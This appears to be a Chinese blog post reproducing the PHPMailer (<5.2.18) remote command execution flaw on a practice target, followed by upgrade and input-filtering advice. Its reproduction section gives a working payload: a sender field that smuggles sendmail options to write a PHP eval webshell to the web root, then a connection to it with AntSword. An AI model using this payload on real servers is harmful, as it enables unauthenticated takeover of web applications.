PHPMailer远程命令执行漏洞复现

PHPMailer远程命令执行漏洞复现

漏洞简介:

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

影响版本:

PHPMailer<5.2.18

环境搭建:

这里采用现成靶机

漏洞复现:

aaa

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com

<?php @eval($_POST['thelostworld']); ?>  注意:(空格很严格)

发送邮件

PHPMailer远程命令执行漏洞复现

 显示发送不成功,其实已经发送成功

PHPMailer远程命令执行漏洞复现

访问上传的shell文件,发现上传成功 

PHPMailer远程命令执行漏洞复现 蚁剑进行连接,获得后台

 PHPMailer远程命令执行漏洞复现

 

漏洞防御:

目前此漏洞已经修复,建议及时升级更新至PHPMailer 6.5.0。

下载链接:

https://github.com/PHPMailer/PHPMailer

通用安全建议:

对代码进行安全审计,尽早检测潜在的安全漏洞,并增强代码逻辑性。

对用户的输入进行过滤或转义,避免参数可控。

用户应定期更新软件、程序和应用程序,确保应用程序是最新的,以保护系统免受漏洞利用

上一篇:Spring,SpringMVC,SpringBoot,SpringCloud有什么区别和联系?


下一篇:Restful风格+SpringMVC+项目入门时一些坑的总结